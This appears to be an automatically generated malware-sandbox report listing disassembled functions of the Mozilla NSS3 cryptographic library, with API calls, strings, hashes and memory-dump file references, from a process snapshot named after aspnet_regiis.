Opcode Fuzzy Hash: 74334fa409b6f0192e07c60394f5e9657be5439720e83164282f31a9d76ba7ab
Instruction Fuzzy Hash: F4814CB1A40209ABDB00DFA5DC85EDE7BB5BF09318F150038E949A7B11E731E9648BE1

Function 6C3D4CF0 Relevance: 21.2, APIs: 14, Instructions: 237memoryCOMMON

Download Yara Rule

APIs

PK11_SignatureLen.NSS3(?), ref: 6C3D4D80
PORT_Alloc_Util.NSS3(00000000), ref: 6C3D4D95
PORT_NewArena_Util.NSS3(00000800), ref: 6C3D4DF2
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C3D4E2C
PR_SetError.NSS3(FFFFE028,00000000), ref: 6C3D4E43
PORT_NewArena_Util.NSS3(00000800), ref: 6C3D4E58
SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6C3D4E85
DER_Encode_Util.NSS3(?,?,6C5205A4,00000000), ref: 6C3D4EA7
PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6C3D4F17
DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6C3D4F45
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C3D4F62
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C3D4F7A
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C3D4F89
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C3D4FC8

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
String ID:
API String ID: 2843999940-0
Opcode ID: 637617c97372d76fa1ad4dc9ee09c4d70d70b352cf4146278d41bd3b8972e615
Instruction ID: efe7617b5f1806af8218920ee5a3de16b857db2bdca3f5d8d02e2c546bb36fd2
Opcode Fuzzy Hash: 637617c97372d76fa1ad4dc9ee09c4d70d70b352cf4146278d41bd3b8972e615
Instruction Fuzzy Hash: 80819172908301AFE711CF24D880F5AB7E8AB84358F16852DF998DBA51E771E905CF92

Function 6C408F40 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(6C409582), ref: 6C408F5B

Part of subcall function 6C41BE30: SECOID_FindOID_Util.NSS3(6C3D311B,00000000,?,6C3D311B,?), ref: 6C41BE44

PORT_NewArena_Util.NSS3(00000800), ref: 6C408F6A

Part of subcall function 6C420FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C3C87ED,00000800,6C3BEF74,00000000), ref: 6C421000
Part of subcall function 6C420FF0: PR_NewLock.NSS3(?,00000800,6C3BEF74,00000000), ref: 6C421016
Part of subcall function 6C420FF0: PL_InitArenaPool.NSS3(00000000,security,6C3C87ED,00000008,?,00000800,6C3BEF74,00000000), ref: 6C42102B

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C408FC3
PK11_GetIVLength.NSS3(-00000001), ref: 6C408FE0
SEC_ASN1DecodeItem_Util.NSS3(?,?,6C4ED820,6C409576), ref: 6C408FF9
DER_GetInteger_Util.NSS3(?), ref: 6C40901D
PORT_ZAlloc_Util.NSS3(?), ref: 6C40903E
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C409062
memcpy.VCRUNTIME140(00000024,?,?), ref: 6C4090A2
PORT_ZAlloc_Util.NSS3(?), ref: 6C4090CA
memcpy.VCRUNTIME140(00000018,?,?), ref: 6C4090F0
PR_SetError.NSS3(FFFFE006,00000000), ref: 6C40912D
free.MOZGLUE(00000000), ref: 6C409136
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C409145

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Util$Tag_$AlgorithmAlloc_Arena_Findmemcpy$ArenaDecodeErrorFreeInitInteger_Item_K11_LengthLockPoolcallocfree
String ID:
API String ID: 3626836424-0
Opcode ID: e688aafef691277773a94631de8c61e60919d99400e5cd5219334ffa1ddf8ef9
Instruction ID: 9ea8b9c70671dd163d0e6862beec0193bf96eb64e60ec9e1e77c9c476d1b6c63
Opcode Fuzzy Hash: e688aafef691277773a94631de8c61e60919d99400e5cd5219334ffa1ddf8ef9
Instruction Fuzzy Hash: 0751B0B1B443009BE700CF289C81F9BB7E5AF94318F054539E8599B742E776E949CBD2

Function 6C4D4960 Relevance: 21.1, APIs: 14, Instructions: 121COMMON

Download Yara Rule

APIs

malloc.MOZGLUE(00000004,?,6C4D8061,?,?,?,?), ref: 6C4D497D
OpenSemaphoreA.KERNEL32(00100002,00000000,?), ref: 6C4D499E
GetLastError.KERNEL32(?,?,6C4D8061,?,?,?,?), ref: 6C4D49AC
PR_SetError.NSS3(FFFFE8C2,0000007B,?,?,6C4D8061,?,?,?,?), ref: 6C4D49C2

Part of subcall function 6C46C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C46C2BF

PR_SetError.NSS3(FFFFE890,00000000,?,?,6C4D8061,?,?,?,?), ref: 6C4D49D6
CreateSemaphoreA.KERNEL32(00000000,6C4D8061,7FFFFFFF,?), ref: 6C4D4A19
GetLastError.KERNEL32(?,?,?,?,6C4D8061,?,?,?,?), ref: 6C4D4A30
PR_SetError.NSS3(FFFFE8C9,000000B7,?,?,?,?,6C4D8061,?,?,?,?), ref: 6C4D4A49
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,6C4D8061,?,?,?,?), ref: 6C4D4A52
GetLastError.KERNEL32(?,?,?,?,6C4D8061,?,?,?,?), ref: 6C4D4A5A
free.MOZGLUE(00000000,?,?,?,?,?,6C4D8061,?,?,?,?), ref: 6C4D4A6A
CreateSemaphoreA.KERNEL32(?,6C4D8061,7FFFFFFF,?), ref: 6C4D4A9A
free.MOZGLUE(?,?,?,?,?,6C4D8061,?,?,?,?), ref: 6C4D4AAE
free.MOZGLUE(?,?,?,?,?,6C4D8061,?,?,?,?), ref: 6C4D4AC2

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Error$LastSemaphorefree$Create$CloseHandleOpenValuemalloc
String ID:
API String ID: 2092618053-0
Opcode ID: 5ccbc450f99240ac2714f81ab0e5c20aafe0420cc0900b15175521eb86e034aa
Instruction ID: 201402e41c7bf105c29c64672062cfbadef21a5867f0f5e4b375e6f867dd0f91
Opcode Fuzzy Hash: 5ccbc450f99240ac2714f81ab0e5c20aafe0420cc0900b15175521eb86e034aa
Instruction Fuzzy Hash: 2D41C474B002059BDF00FFB98C49F4A77F8AB4A399F110138ED19E7B40DB35A9148B69

Function 6C3FADC0 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageSignInit), ref: 6C3FADE6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C3FAE17
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C3FAE29

Part of subcall function 6C4DD930: PL_strncpyz.NSS3(?,?,?), ref: 6C4DD963

PR_LogPrint.NSS3(?,00000000), ref: 6C3FAE3F
PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6C3FAE78
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C3FAE8A
PR_LogPrint.NSS3(?,00000000), ref: 6C3FAEA0

Strings

nMl, xrefs: 6C3FAEB8, 6C3FAEE6
(CK_INVALID_HANDLE), xrefs: 6C3FAE1F, 6C3FAE80
hKey = 0x%x, xrefs: 6C3FAE62, 6C3FAE72
hSession = 0x%x, xrefs: 6C3FAE01, 6C3FAE11
C_MessageSignInit, xrefs: 6C3FADE1

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hKey = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageSignInit$nMl
API String ID: 332880674-2286825424
Opcode ID: 66b047f3e63308f35d5bfac9b328fff57e95c2ba1cc81e9130da65966c0efe66
Instruction ID: 4a1512629fcbf7c5eac9b485795f8a07e2ce879323cb3af3abfa31754cc76938
Opcode Fuzzy Hash: 66b047f3e63308f35d5bfac9b328fff57e95c2ba1cc81e9130da65966c0efe66
Instruction Fuzzy Hash: B831EA75601244AFDB00DF14DC98FAE37B5AB4631DF464829E4196BB11D734A809CFAB

Function 6C3F2DD0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_InitPIN), ref: 6C3F2DF6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C3F2E24
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C3F2E33

Part of subcall function 6C4DD930: PL_strncpyz.NSS3(?,?,?), ref: 6C4DD963

PR_LogPrint.NSS3(?,00000000), ref: 6C3F2E49
PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C3F2E68
PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C3F2E81

Strings

C_InitPIN, xrefs: 6C3F2DF1
nMl, xrefs: 6C3F2E99, 6C3F2EC4
(CK_INVALID_HANDLE), xrefs: 6C3F2E2C
pPin = 0x%p, xrefs: 6C3F2E63
hSession = 0x%x, xrefs: 6C3F2E0E, 6C3F2E1E
ulPinLen = %d, xrefs: 6C3F2E7C

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPin = 0x%p$ ulPinLen = %d$ (CK_INVALID_HANDLE)$C_InitPIN$nMl
API String ID: 1003633598-173923510
Opcode ID: c13b47b154ac268e0c4de6427c28277b649d044b57641b8b2538152f719473d0
Instruction ID: 98ce595ddf90cc83d03d8df4ed62f6fb3a465171ab0861c7e65836e63f183d5e
Opcode Fuzzy Hash: c13b47b154ac268e0c4de6427c28277b649d044b57641b8b2538152f719473d0
Instruction Fuzzy Hash: BB310475601284EFDB00DB14DE4DF8A7BB5EB4632DF0A4425E818A7B11DB359809CFEA

Function 6C3F6EF0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DigestUpdate), ref: 6C3F6F16
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C3F6F44
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C3F6F53

Part of subcall function 6C4DD930: PL_strncpyz.NSS3(?,?,?), ref: 6C4DD963

PR_LogPrint.NSS3(?,00000000), ref: 6C3F6F69
PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6C3F6F88
PR_LogPrint.NSS3( ulPartLen = %d,?), ref: 6C3F6FA1

Strings

ulPartLen = %d, xrefs: 6C3F6F9C
nMl, xrefs: 6C3F6FB9, 6C3F6FE7
(CK_INVALID_HANDLE), xrefs: 6C3F6F4C
pPart = 0x%p, xrefs: 6C3F6F83
C_DigestUpdate, xrefs: 6C3F6F11
hSession = 0x%x, xrefs: 6C3F6F2E, 6C3F6F3E

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPart = 0x%p$ ulPartLen = %d$ (CK_INVALID_HANDLE)$C_DigestUpdate$nMl
API String ID: 1003633598-2941986253
Opcode ID: 5de896633f8433cebbcb148ed5367d1ae917d2634af7ee1e9171f329698f4441
Instruction ID: 59e3afb950c4b5a3c424982d06219cc4c88ecb22c13ea1ba29cf5b6f0863b932
Opcode Fuzzy Hash: 5de896633f8433cebbcb148ed5367d1ae917d2634af7ee1e9171f329698f4441
Instruction Fuzzy Hash: B13107346112409FEB00DB24DD58F9A37F5EB4232DF064429E818A7B12DB35D849CFEA

Function 6C4DC8A0 Relevance: 21.1, APIs: 14, Instructions: 94stringCOMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000020), ref: 6C4DC8B9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C4DC8DA
malloc.MOZGLUE(00000001), ref: 6C4DC8E4
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C4DC8F8
PR_NewLock.NSS3 ref: 6C4DC909
PR_NewCondVar.NSS3(00000000), ref: 6C4DC918
PR_NewCondVar.NSS3(00000000), ref: 6C4DC92A

Part of subcall function 6C3B0F00: PR_GetPageSize.NSS3(6C3B0936,FFFFE8AE,?,6C3416B7,00000000,?,6C3B0936,00000000,?,6C34204A), ref: 6C3B0F1B
Part of subcall function 6C3B0F00: PR_NewLogModule.NSS3(clock,6C3B0936,FFFFE8AE,?,6C3416B7,00000000,?,6C3B0936,00000000,?,6C34204A), ref: 6C3B0F25

free.MOZGLUE(00000000), ref: 6C4DC947

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Cond$LockModulePageSizecallocfreemallocstrcpystrlen
String ID:
API String ID: 2931242645-0
Opcode ID: 8e7c05b6c4d7f0e7cb913ee6d2c47546be77b76b2d607896c8842a893f560cb4
Instruction ID: bfc895759e249b6677840254ca3c6d5d05f3f5cd724f405649d440741411d838
Opcode Fuzzy Hash: 8e7c05b6c4d7f0e7cb913ee6d2c47546be77b76b2d607896c8842a893f560cb4
Instruction Fuzzy Hash: 9621C5B1A006025BEB11FF789C19E5B77F8EF01259F160538E85AC6B00EB31F514CBA6

Function 6C3BAF30 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6C3BAF47

Part of subcall function 6C489090: TlsGetValue.KERNEL32 ref: 6C4890AB
Part of subcall function 6C489090: TlsGetValue.KERNEL32 ref: 6C4890C9
Part of subcall function 6C489090: EnterCriticalSection.KERNEL32 ref: 6C4890E5
Part of subcall function 6C489090: TlsGetValue.KERNEL32 ref: 6C489116
Part of subcall function 6C489090: LeaveCriticalSection.KERNEL32 ref: 6C48913F

FreeLibrary.KERNEL32(?), ref: 6C3BAF6D
free.MOZGLUE(?), ref: 6C3BAFA4
free.MOZGLUE(?), ref: 6C3BAFAA
PR_ExitMonitor.NSS3 ref: 6C3BAFB5
PR_LogPrint.NSS3(%s decr => %d,?,?), ref: 6C3BAFF5
PR_ExitMonitor.NSS3 ref: 6C3BB005
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C3BB014
PR_LogPrint.NSS3(Unloaded library %s,?), ref: 6C3BB028
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C3BB03C

Strings

Unloaded library %s, xrefs: 6C3BB023
%s decr => %d, xrefs: 6C3BAFF0

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: MonitorValue$CriticalEnterErrorExitPrintSectionfree$FreeLeaveLibrary
String ID: %s decr => %d$Unloaded library %s
API String ID: 4015679603-2877805755
Opcode ID: 05e522d1add123d2bc218c9dd5977ddfe4280653c84a92876af4aa17f4e07ef8
Instruction ID: 1f08da87b6d321cd05329144e1196a36430f16de222b83b29d26e9156e1befdb
Opcode Fuzzy Hash: 05e522d1add123d2bc218c9dd5977ddfe4280653c84a92876af4aa17f4e07ef8
Instruction Fuzzy Hash: 5531E5B5A04510ABDA01EF64DC40E9AB7B5EB1571CB154129E805A7E00F737F828CFF6

Function 6C406C30 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 58stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C40781D,00000000,6C3FBE2C,?,6C406B1D,?,?,?,?,00000000,00000000,6C40781D), ref: 6C406C40
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C40781D,?,6C3FBE2C,?), ref: 6C406C58
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C40781D), ref: 6C406C6F
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C406C84
PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C406C96

Part of subcall function 6C3B1240: TlsGetValue.KERNEL32(00000040,?,6C3B116C,NSPR_LOG_MODULES), ref: 6C3B1267
Part of subcall function 6C3B1240: EnterCriticalSection.KERNEL32(?,?,?,6C3B116C,NSPR_LOG_MODULES), ref: 6C3B127C
Part of subcall function 6C3B1240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C3B116C,NSPR_LOG_MODULES), ref: 6C3B1291
Part of subcall function 6C3B1240: PR_Unlock.NSS3(?,?,?,?,6C3B116C,NSPR_LOG_MODULES), ref: 6C3B12A0

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C406CAA

Strings

sql:, xrefs: 6C406C52
NSS_DEFAULT_DB_TYPE, xrefs: 6C406C91
extern:, xrefs: 6C406C7E
dbm, xrefs: 6C406CA4
dbm:, xrefs: 6C406C3A
rdb:, xrefs: 6C406C69

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
API String ID: 4221828374-3736768024
Opcode ID: 1b65e4fd3ad57487e1e200fedbe7b08c1b83fce4a3099e426f9d8294346cb7dd
Instruction ID: f575085fb2830747490bbde24e152091287cbcb53dcf9dce6c30e03c55061d3c
Opcode Fuzzy Hash: 1b65e4fd3ad57487e1e200fedbe7b08c1b83fce4a3099e426f9d8294346cb7dd
Instruction Fuzzy Hash: 0E01D6F178631127F65067795C8AFA6365C9F811DAF140531FE06E0E81EBA2F51940A9

Function 6C414E60 Relevance: 19.7, APIs: 13, Instructions: 186COMMON

Download Yara Rule

APIs

PR_SetErrorText.NSS3(00000000,00000000,?,6C3D78F8), ref: 6C414E6D

Part of subcall function 6C3B09E0: TlsGetValue.KERNEL32(00000000,?,?,?,6C3B06A2,00000000,?), ref: 6C3B09F8
Part of subcall function 6C3B09E0: malloc.MOZGLUE(0000001F), ref: 6C3B0A18
Part of subcall function 6C3B09E0: memcpy.VCRUNTIME140(?,?,00000001), ref: 6C3B0A33

PR_SetError.NSS3(FFFFE09A,00000000,?,?,?,6C3D78F8), ref: 6C414ED9

Part of subcall function 6C405920: NSSUTIL_ArgHasFlag.NSS3(flags,printPolicyFeedback,?,?,?,?,?,?,00000000,?,00000000,?,6C407703,?,00000000,00000000), ref: 6C405942
Part of subcall function 6C405920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckIdentifier,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C407703), ref: 6C405954
Part of subcall function 6C405920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckValue,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C40596A
Part of subcall function 6C405920: SECOID_Init.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C405984
Part of subcall function 6C405920: NSSUTIL_ArgGetParamValue.NSS3(disallow,00000000), ref: 6C405999
Part of subcall function 6C405920: free.MOZGLUE(00000000), ref: 6C4059BA
Part of subcall function 6C405920: NSSUTIL_ArgGetParamValue.NSS3(allow,00000000), ref: 6C4059D3
Part of subcall function 6C405920: free.MOZGLUE(00000000), ref: 6C4059F5
Part of subcall function 6C405920: NSSUTIL_ArgGetParamValue.NSS3(disable,00000000), ref: 6C405A0A
Part of subcall function 6C405920: free.MOZGLUE(00000000), ref: 6C405A2E
Part of subcall function 6C405920: NSSUTIL_ArgGetParamValue.NSS3(enable,00000000), ref: 6C405A43

SECMOD_FindModule.NSS3(?,?,?,?,?,?,?,?,?,6C3D78F8), ref: 6C414EB3

Part of subcall function 6C414820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C414EB8,?,?,?,?,?,?,?,?,?,?,6C3D78F8), ref: 6C41484C
Part of subcall function 6C414820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C414EB8,?,?,?,?,?,?,?,?,?,?,6C3D78F8), ref: 6C41486D
Part of subcall function 6C414820: PR_SetError.NSS3(FFFFE09A,00000000,00000000,-00000001,00000000,?,6C414EB8,?), ref: 6C414884

SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C3D78F8), ref: 6C414EC0

Part of subcall function 6C414470: TlsGetValue.KERNEL32(00000000,?,6C3D7296,00000000), ref: 6C414487
Part of subcall function 6C414470: EnterCriticalSection.KERNEL32(?,?,?,6C3D7296,00000000), ref: 6C4144A0
Part of subcall function 6C414470: PR_Unlock.NSS3(?,?,?,?,6C3D7296,00000000), ref: 6C4144BB

TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C3D78F8), ref: 6C414F16
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C3D78F8), ref: 6C414F2E
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6C3D78F8), ref: 6C414F40
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C3D78F8), ref: 6C414F6C
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6C3D78F8), ref: 6C414F80
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C3D78F8), ref: 6C414F8F
PK11_UpdateSlotAttribute.NSS3(?,6C4EDCB0,00000000), ref: 6C414FFE
PK11_UserDisableSlot.NSS3(0000001E), ref: 6C41501F
SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,6C3D78F8), ref: 6C41506B

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
